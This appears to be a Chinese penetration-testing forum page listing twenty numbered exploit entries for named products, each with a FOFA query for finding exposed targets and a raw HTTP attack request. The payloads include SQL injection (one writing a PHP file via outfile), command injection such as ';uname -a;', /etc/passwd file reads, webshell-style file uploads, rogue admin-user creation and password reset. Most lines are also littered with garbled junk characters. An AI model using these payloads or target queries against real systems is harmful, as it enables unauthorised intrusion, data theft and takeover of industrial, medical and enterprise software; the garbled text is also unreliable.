( H5 a% c) W: x+ J) |" G9 G% v9 c+ y8 h5 b7 @! O5 m# i0 |6 h
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ t" A2 n$ g# X2 V) Z$ xFOFA:server="SunFull-Webs") i  l7 O3 |- a# u$ Z
POST /soap/AddUser HTTP/1.14 c% b; l- Q/ \# `, A. T6 d
Host: your-ip  K$ R3 X# [/ v$ Z( T$ l7 ~
Accept-Encoding: gzip, deflate
! b& c# j+ V  ~$ w2 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 W6 L% S7 T( F6 M4 Z5 l! ?Accept: application/xml, text/xml, */*; q=0.01* E9 A' w: j$ r# k8 l/ n# r
Content-Type: text/xml; charset=utf-84 C6 W& I" [9 m' m6 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 v8 `# z; Q9 Y6 X7 NX-Requested-With: XMLHttpRequest
/ {: C% f* Q4 E' |& ~/ K7 [2 I: r# A3 {0 y0 K5 v
$ q7 `. _8 R2 S  F, H
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
& E" ^. J  H% }6 [! D2 Q' L8 ~: `- V# @  G, w7 T

# `& M. {, h$ n185. 瑞友天翼应用虚拟化系统SQL注入
+ U- K3 l# R4 y  G; vversion < 7.0.5.17 d9 W# h; @2 |# e
FOFA:app="REALOR-天翼应用虚拟化系统"( [$ s! Z% Q) D) y6 i; @8 w
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1" D7 _' H5 M0 {
Host: host
8 Y2 X' \  O: S: _8 X7 K; v/ I1 X% g

- j' i& c& X0 c$ j6 U. X+ H186. F-logic DataCube3 SQL注入; @" u" O9 Q4 n1 B
CVE-2024-31750
" q$ {( U; O' F0 A9 mF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统2 X7 t$ D2 ?) H4 y
FOFA:title=="DataCube3"7 D3 C! M! J( ^6 ?
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1! q; _: I9 r* l
Host: your-ip) l) N8 v  W/ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
. t. t; `$ R+ i+ q& WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.83 i" ^) `3 ?/ q% @3 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. L' {' U* _0 `! I4 i: [0 C
Accept-Encoding: gzip, deflate
! J# O0 F; I+ ~; \' x% J4 [Connection: close9 r9 |( l; i' a5 H
Content-Type: application/x-www-form-urlencoded3 r: y; ?0 K* C- A- A

. V9 @% C+ x6 R8 Treq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450. Y/ T9 s/ p! Y3 ?5 Q& N0 e
( R; v2 A! n7 b6 k
1 Q- Q$ u$ i8 P0 }
187. Mura CMS processAsyncObject SQL注入
' z7 m2 k. m: H# {( lCVE-2024-326401 f. Z% i) ?( K7 i4 w
FOFA:"Mura CMS"$ t/ i0 O: l4 M; G1 Z% v% I
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
# R+ a/ ~# g% R1 N; qHost: your-ip
/ m6 v: Y7 I! H. ^Content-Type: application/x-www-form-urlencoded
! D. t  q$ w5 B: D+ F( h$ O$ w" f8 V1 }/ _3 u1 n
  R) L6 ~- ^; D! z' f
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
  h5 f' d/ K, E
4 M- i$ b: U1 F1 ~( \. W  k" |' C9 F0 ?. Q' u2 f3 {
188. 叁体-佳会视频会议 attachment 任意文件读取
4 s( m- V) `+ eversion <= 3.9.7
3 U. A. s. \" @9 [* k  TFOFA:body="/system/get_rtc_user_defined_info?site_id"
" ?, A# E8 c0 e3 p' ^% eGET /attachment?file=/etc/passwd HTTP/1.1
' s2 X, J; |; ]Host: your-ip. R& }6 ~0 g5 d0 |; K# T% W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 z, Y* v% W2 \9 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 ~9 C: D  L7 ?  R* H
Accept-Encoding: gzip, deflate
# \- a, K4 Q4 ]9 H; K- g9 q( ^& PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
# [6 w# s5 s& D$ Y- NConnection: close
9 g, A" F7 t, A8 e* n5 u+ j. B0 v% D$ o6 T" l, h( T' R$ L& ?

7 }* U* s& z- N; l* ^189. 蓝网科技临床浏览系统 deleteStudy SQL注入( Y! L" w: ]- ?/ r- v' r# B7 g
FOFA:app="LANWON-临床浏览系统") X4 k- B1 E$ b0 c3 L
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1; [3 i* g- I0 W) A
Host: your-ip+ R! ]5 ]1 H5 O8 W3 y8 c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 o+ U+ P  }7 c! XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* w/ J$ W" O. h) k3 O0 N
Accept-Encoding: gzip, deflate$ s9 Q2 ~% ?5 e
Accept-Language: zh-CN,zh;q=0.9
1 `% c, O- l, g2 m( A; cConnection: close: a* ]1 K7 U4 r: c4 Y

4 s0 V: Z6 a" R) u. |; Z4 g$ K+ S1 v8 S8 L% R; s- m9 k- n/ I
190. 短视频矩阵营销系统 poihuoqu 任意文件读取" e  Y3 b, k" T& f& n3 _
FOFA:title=="短视频矩阵营销系统"
# O+ l, g1 [! d$ W9 TPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
5 C4 K- K" U# j7 nHost: your-ip
3 u0 d5 w5 a. v1 |4 c* xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.368 B; r; Y; h! h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: U9 _2 e! S" P$ a6 s: y( T
Content-Type: application/x-www-form-urlencoded
+ R8 z* \( l$ N& x  F4 v3 UAccept-Encoding: gzip, deflate2 ?/ t/ }  d" k& r" i6 x" t
Accept-Language: zh-CN,zh;q=0.9
$ ~9 e$ M7 {3 R! h
& V  K5 w2 V  K1 Npoi=file:///etc/passwd: d* {! y5 j5 b* ]; b

: r' N8 ?( C' O3 A7 |( {* q+ a, J% y. O: J1 E  l$ `9 g0 F( S. _
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
' _5 _: ~& W: z4 T2 f. rFOFA:body="/CDGServer3/index.jsp"
. w1 Z  b7 {3 I6 a) T5 n$ `" LPOST /CDGServer3/js/../NavigationAjax HTTP/1.1" c7 v, _# o  @0 Y
Host: your-ip, Z5 y3 X: }9 L: \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: [  Z  }4 Q0 `5 s- {* aContent-Type: application/x-www-form-urlencoded$ D1 K: ~2 m) v, c& V  Z- N! @

. l8 C0 V* t; G" z+ scommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
- k: j! I  P$ g7 }0 k8 @% Z; r" C+ r) y; m. P
/ x1 q$ }. z6 ~3 Q& B: t/ L
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) [. d7 [9 D  [1 e% }' c6 N" H0 w& C
FOFA:title="用户登录_富通天下外贸ERP"
3 A( q, w: J# Z* B& qPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
$ V; J& |. G" i8 UHost: your-ip0 H( U/ I% j: @( p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
6 s' r! G; S8 F, ZContent-Type: application/x-www-form-urlencoded
+ Z4 H# e! ?1 A6 _$ Z5 x
" H. {: P8 v6 J- _8 {1 i
: l% p/ Z# F. G7 ]<% @ webhandler language="C#" class="AverageHandler" %>& Z3 B0 z- n' s$ {: L8 \
using System;
7 B% z3 Z/ }  s. s2 f* i3 Q& Dusing System.Web;
- ?. ^1 `) M' kpublic class AverageHandler : IHttpHandler
8 V/ V# H3 n8 P{
6 N& d$ e; C3 a; V$ Gpublic bool IsReusable
' W+ L  E/ g$ |1 I, A/ ?7 }{ get { return true; } }
) ^2 ^2 N6 ]6 R) B- Qpublic void ProcessRequest(HttpContext ctx)
0 a0 g$ w: L( n& V4 q{
8 A7 F3 c& g# a8 V! rctx.Response.Write("test");
1 X: G/ J" q# O" f( Q# U: E}
  `# ~0 i1 H: C( S( c; n2 z" K. V" z}
0 f5 g: a3 n9 p8 W
$ C4 o1 j3 s7 C( w+ I8 p
+ v5 c2 ]: z  W" _% U* o193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
' Y  w, b7 w7 V; b* ^3 AFOFA:body="山石云鉴主机安全管理系统"4 [" @% h# p6 @1 B9 }
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
  K& s1 R; I* r4 S: L. }6 k: w: W+ jHost:
$ c* N; t7 u3 a# ^Cookie: PHPSESSID=2333333333333;1 Z  z" m7 ^/ i5 B& [
Content-Type: application/x-www-form-urlencoded  ?( a! ?  v7 E$ D& V. ^# Z
User-Agent: Mozilla/5.0
  d3 j" e2 [3 n* `9 @1 A8 q5 |$ `$ B9 v( H) D$ {' C  a
$ Z/ W! D) M5 X# X
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1) f) {! v9 p4 G6 d
Host:! |0 F: ~' K3 p2 E8 d
User-Agent: Mozilla/5.08 P) \+ [1 u$ {/ a/ o5 u! g7 u# I
Accept-Encoding: gzip, deflate; m1 f; p9 W+ _+ U! m! c' l
Accept: */*: s1 Z7 |/ B5 S( Q2 M; t
Connection: close( M6 p  }; a' {: q( }
Cookie: PHPSESSID=2333333333333;5 u- U7 s. @9 ?& m  f! W
Content-Type: application/x-www-form-urlencoded& A9 i  n5 T4 Z$ V
Content-Length: 84
7 U) b) T' `9 r# c( p# ?- u& u# I0 J6 \
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')7 [* c8 Y  H2 _; H

( A8 S/ F1 @3 k9 R( b6 }
! R! D; [0 i; @1 m" G* w3 X  P( c+ eGET /master/img/config HTTP/1.1
3 B" R" R. \( CHost:
4 b: {3 R- @" l4 ~3 V- \1 v; c/ wUser-Agent: Mozilla/5.0
. B# L4 b; D8 D# z8 I$ }2 Y/ y8 ^" V8 I( c
1 w& C& ?! K6 L/ B$ P
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. h- K! z6 A. s& o1 f3 L$ Z* PFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
4 ~7 o$ J8 U2 u3 B  N4 Q( l
' z) G0 b, Q( [- A% d" F) b( FPOST /servlet/uploadAttachmentServlet HTTP/1.12 s: t+ y& ~8 E) T0 C: \: Z9 H
Host: host
! w& G/ p4 _/ `# L/ z: I, NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
4 j) U* @6 A% w/ _) F, z. {* LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ x6 q0 \3 H' C( ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; s' ]& ~, K3 n  ?0 @6 FAccept-Encoding: gzip, deflate
  N5 Q% c) Y! N* s6 Y9 h) i  `Connection: close+ P2 r1 H: R- R+ Q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk; q6 D0 K3 H6 s! f1 `: @
------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 F0 [; u3 X% m5 ?$ H7 w( h
, b$ _0 O$ L8 K( z2 i0 R# h# ]
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
: K0 p& S6 E7 w; t5 _2 c: {Content-Type: text/plain
* \* E% R0 ]. A$ E/ }$ k! Z5 E<% out.println("hello");%>
) K2 V0 G# a: h& G& x) m------WebKitFormBoundaryKNt0t4vBe8cX9rZk0 x4 E3 x) ~5 e4 s; x0 Q
Content-Disposition: form-data; name="json": k2 I2 f9 E) S5 R
{"iq":{"query":{"UpdateType":"mail"}}}
2 e9 V) A) N5 j  P0 C4 ?------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' `/ z* w% ^: a, O, T4 L* n: \

, D" h5 n& m6 E9 @  g' c" n, n8 }' `% ~! [! S
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行7 `$ `2 ^+ N3 m; [$ A4 ^& q7 W
FOFA:title=="飞鱼星企业级智能上网行为管理系统
) a) D1 y& Y+ o0 b5 O0 rPOST /send_order.cgi?parameter=operation HTTP/1.1: e3 u& g3 I+ d3 n5 v
Host: 127.0.0.1
! T/ k3 L/ q1 I9 l2 `- d; S' uPragma: no-cache# S4 X- q0 E. X' p$ H
Cache-Control: no-cache  _, V, H, O9 i$ z2 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 Q% K1 Q4 M+ Y! L
Accept: */*8 z$ G# ]  T! W. a+ ^. x; c4 x+ q2 R
Accept-Encoding: gzip, deflate
( o( ?* _# j3 I  s0 G) `0 UAccept-Language: zh-CN,zh;q=0.9; l" R( @" V2 o) A4 }/ n; F5 S
Connection: close' W* B6 Z! L; L" ?
Content-Type: application/x-www-form-urlencoded
, E, v0 U6 N  CContent-Length: 687 N9 F. R) L1 G1 ]3 ~
# x0 _+ r8 B0 l
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 q9 K( m2 `7 k# g4 k- G

# c  X4 N) P4 N/ m
. ?; u/ k: Q7 L, [# u, h196. 河南省风速科技统一认证平台密码重置
1 z% [/ q' N/ TFOFA:body="/cas/themes/zbvc/js/jquery.min.js"/ p$ d  w5 N* j. p5 {7 ]8 `4 V. z
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 V' F3 q# s5 [- [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" s! U9 q8 }' z% I
Content-Type: application/json;charset=UTF-89 C; D! `0 Z! s1 N
X-Requested-With: XMLHttpRequest
# P5 ]2 z5 k  _; R6 {Host:1 A% J' n, l/ J: N
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
! c* l% T0 i+ A: {Content-Length: 45
8 T2 f0 v, Y/ a, `' N7 t: TConnection: close; D3 j6 [6 U! x) M* b& C7 _# o: g
" Z8 t" g% g0 c8 \2 A# F4 f1 I
{"xgh":"test","newPass":"test666","email":""}: w- H: [! R8 ~+ ^5 q( @# Y

7 s2 H! _& Z/ c! w5 z7 z2 r- C. X1 `( J# b- A

# _# T# Q  b4 f0 T197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
; |& j" V0 o- T: F1 TFOFA:app="浙大恩特客户资源管理系统"
) z" h# T5 F' `) |! fGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.10 L, y& r! h# `2 P2 {
Host:
0 U$ {8 Q# p( ?% r9 b1 }, z9 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36$ J1 w# w, V4 v
Accept-Encoding: gzip, deflate9 I; M: z+ I! D  g* |+ ?1 |+ ?, C) s% S
Connection: close* ^  h( c* |. Y
5 K- i# s' `6 r8 \0 S6 ]
* e2 f' T& X) G; j4 n% w' `

+ T# r5 P9 V+ {3 W# h, r9 V198.  阿里云盘 WebDAV 命令注入
- P# Z+ |! v2 `( T( rCVE-2024-29640
2 f: ?- L" J2 u, q* G. Z- JGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1; S; l# r7 P- `' Y, x" p" t
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf643 M% d, T. S/ z/ U( r9 u7 t
Accept: */*
. _6 W* U, C& a: ]5 c4 |Accept-Encoding: gzip, deflate
7 P! H& Y* J9 \2 |3 D8 o; jAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6  H4 q( k2 T( g1 b) @- ^
Connection: close; h$ [1 h/ a, }& y7 Z

, G5 h8 R8 E! C8 D: |/ d$ e: f6 |* t+ L5 @
199. cockpit系统assetsmanager_upload接口 文件上传5 J! i) {$ x+ Z0 [

1 q0 f# i+ T7 L  I7 t: U1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
" f/ r% N6 J1 z- z: ]GET /auth/login?to=/ HTTP/1.1
7 e" @: X$ B9 e# H
$ e' w9 ^& _% I% c5 B% x7 b; ~响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
* L# w  B) l2 i" V- M1 m4 t& S9 C- s8 E( @: W
2.使用刚才上一步获取到的jwt获取cookie:
% \1 u6 X; ~+ d9 n  r0 W* Z, f7 {& j$ I
POST /auth/check HTTP/1.1
# P: e  r  z+ a4 E3 C) b7 D9 F2 BContent-Type: application/json
7 W! {2 s! X' o+ _' r* c$ F: L, O) m  a5 z( f8 P3 M- g
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}7 F. c1 Y4 L2 r+ r
. @; Z7 o7 [3 D: A! k& |) [
响应:200,返回值:# d% q) H6 i2 q3 D' ~
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
1 z' \# _& I# pFofa:title="Authenticate Please!"
8 B; r/ d: P* ?* h( g# ~POST /assetsmanager/upload HTTP/1.18 \9 S8 x1 u) n0 G) i; r
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
( t1 K6 A) f( O4 s; d) |1 X  I% eCookie: mysession=95524f01e238bf51bb60d77ede3bea927 g$ k( x' W+ u  Z$ k/ r

4 V+ K. N% `' C/ G, S" t: B-----------------------------36D28FBc36bd6feE7Fb39 ^  ?+ w1 p! u+ Y" @
Content-Disposition: form-data; name="files[]"; filename="tttt.php"2 Z! ~3 ^; I7 K3 L
Content-Type: text/php
% S+ o  c; v& g' h1 s* i3 a) B1 R3 `/ W7 G5 y7 z% C, k
<?php echo "tttt";unlink(__FILE__);?>
# t; l6 ^' E1 H/ d-----------------------------36D28FBc36bd6feE7Fb3
, t" g! w, p8 i3 nContent-Disposition: form-data; name="folder"
1 {% r. M/ ]8 H8 {. q$ W
* A4 }4 h6 k% ~) i3 }; i$ Z-----------------------------36D28FBc36bd6feE7Fb3--2 c8 A; {0 w9 j6 Q; N2 n9 d3 g' j

& N8 O0 G0 P7 Q2 f5 u
! z9 S# [! c- C/storage/uploads/tttt.php9 [, F) p. C/ j  C6 t4 d

1 ?8 K  ^$ G# p200. SeaCMS海洋影视管理系统dmku SQL注入8 |1 T& p5 Q6 C0 L  E
FOFA:app="海洋CMS"
* Q4 s6 R+ Y3 j' l8 J2 i1 j5 qGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1) n7 H+ J3 {6 b6 J2 O7 k; f# _
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s8 ]( A4 K: _2 V+ v! H
Upgrade-Insecure-Requests: 1. z  j! T& _- f$ V+ o6 ?: n! m
Cache-Control: max-age=0
4 _3 t5 U- b0 [$ Y# B- c% a( u  RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# Q+ t( u9 M1 [  X( T0 b  R
Accept-Encoding: gzip, deflate# ]: E. ^/ [! g$ J1 Z+ n
Accept-Language: zh-CN,zh;q=0.9
+ n. K! L8 V) f$ Y
% y9 T# a) T! y& Q) z3 [: Y- p/ B7 T! ]1 m/ v# J
201. 方正全媒体新闻采编系统 binary SQL注入
! F8 C+ z: E' _FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ j  w* ~! X& |- N  APOST /newsedit/newsplan/task/binary.do HTTP/1.1
0 L0 B2 D, w8 X) H" e0 y# c3 BContent-Type: application/x-www-form-urlencoded( |8 M$ [0 D; n. @8 g1 K  T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& c9 ~! {1 r1 D: x/ N9 j5 U4 `8 bAccept-Encoding: gzip, deflate
! o) ^+ Q+ z( u# M# pAccept-Language: zh-CN,zh;q=0.9
! |, J9 Y- B, YConnection: close# m' _  R8 ]' {0 q
0 U/ G  b+ c) m! M3 P
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
- `  x% P# q9 D9 }, S) f& F" K; T& F& z% {6 Q0 j; V
$ E1 g& C7 ^# w. z2 ]+ }
202. 微擎系统 AccountEdit任意文件上传
, Y2 N8 i+ Y. |2 ]FOFA:body="/Widgets/WidgetCollection/"7 O9 Q7 J9 D" T0 E1 c7 N
获取__VIEWSTATE和__EVENTVALIDATION值8 i( S* G4 `5 {! R
GET /User/AccountEdit.aspx HTTP/1.1
4 c* l+ U9 [8 K: }Host: 滑板人之家( z/ ^8 w/ f3 o5 E1 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
+ A2 ?; ^" F( R$ A: \3 \  o3 HContent-Length: 05 d; Y* v, L( l( g0 l: k
: @/ I6 Q: ]) I1 r' ^0 f% f# Q* b
; p3 S/ @: B+ d! T8 d; T5 ]; O* k
替换__VIEWSTATE和__EVENTVALIDATION值6 U. r5 d: U, x+ F( {% j3 B6 N
POST /User/AccountEdit.aspx HTTP/1.1
0 l( r" t2 V; ^$ {- T2 }Accept-Encoding: gzip, deflate, br) O; U- ^" `. D5 _
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687- s! f1 Q- a4 \* ~. p# A& V. z( m
3 f$ e: d2 l  I0 a
-----------------------------786435874t38587593865736587346567358735687
. u, a1 A! p- a) e6 j5 aContent-Disposition: form-data; name="__VIEWSTATE"
# d% E4 |8 N8 m
% q* Q6 ^$ r( L; i/ C! f0 x' p__VIEWSTATE" G5 K- i/ C% l
-----------------------------786435874t38587593865736587346567358735687
& C3 D$ w( ^9 J. W5 d0 U; \Content-Disposition: form-data; name="__EVENTVALIDATION"
9 j4 K% i4 V+ t; c5 Q5 n( l
# A2 M9 E9 t& j3 q__EVENTVALIDATION
# I' L( X8 K. P9 F5 ~( C2 ~/ I-----------------------------786435874t38587593865736587346567358735687
+ f1 S- g; C8 {% d9 R: e: ]2 j, oContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
" ^! v$ ]; W/ N* D1 ]Content-Type: text/plain
; o( Y6 ~9 o& U+ o! q. f: O7 Q$ K0 h4 @( _
Hello World!6 {; f7 z+ b- q$ v& _9 t0 Q
-----------------------------786435874t38587593865736587346567358735687
3 M' C9 N9 A, [) G& cContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
8 @9 p$ \& Z) W4 z0 J* m
4 {* n, u/ @' _5 a; s( ~上传图片. n" [  j6 c7 ?  K: y* w9 X
-----------------------------786435874t38587593865736587346567358735687
# b( n) T9 [6 j3 I; C' ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"  ~4 @  H% I9 w4 Q

$ J# i' Z! Y% l
+ N) K, x7 y; n2 D-----------------------------786435874t385875938657365873465673587356878 l$ f  ~! U! h
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
2 p/ Q+ N8 K1 i2 j3 F- {2 C) g$ J) L7 I# J

" V9 k& ?- m: ^0 Z. w. }-----------------------------786435874t38587593865736587346567358735687--  z2 M9 Z. F( V0 g% a; O
, G9 [0 {" u4 y$ u: Y, B

4 p- I9 Z/ S7 I3 c  `& m( }6 k/_data/Uploads/1123.txt
) W1 ?: b6 D; [( u/ f% V: ]) _
4 Z  \  L9 |* d8 e8 n. O203. 红海云EHR PtFjk 文件上传4 d5 {' W0 n% A: O# ?
FOFA:body="RedseaPlatform"
5 Q3 b: c. C/ qPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" f5 `3 r4 a1 Z/ e! ?
Host: x.x.x.x
& T$ \; H$ J. `% KAccept-Encoding: gzip; S& W8 K! k! v8 P! r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 O* j$ G, @" h8 tContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
7 i) s. L0 v; Q. f, h* P# ~/ _- e! tContent-Length: 210& O/ i% U! d( N/ q
2 _/ t& O  N$ w# M; b" @4 Q
------WebKitFormBoundaryt7WbDl1tXogoZys4
" I9 {7 j# y/ @) d2 f" O8 eContent-Disposition: form-data; name="fj_file"; filename="11.jsp"% r+ P# T! E- k) w# y: c# k
Content-Type:image/jpeg4 j8 J" P7 F/ z7 x, e( x! @8 N

7 t4 t; l7 m( \3 s3 b4 C% s<% out.print("hello,eHR");%>
: q! \; p; g( o  j------WebKitFormBoundaryt7WbDl1tXogoZys4--- K( ~; Q* ~0 v0 l9 _2 S0 D* N4 p

# g& i( A! H. H" f3 p3 Y 7 e. X5 g  t; H- H

' ~4 P4 o2 U' g& A6 o; i
4 |: w9 p% X5 Y+ d0 s; w3 b& ^# b7 P) i; _5 r; M; R" {8 S

1 |; A9 K  s: @0 n



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2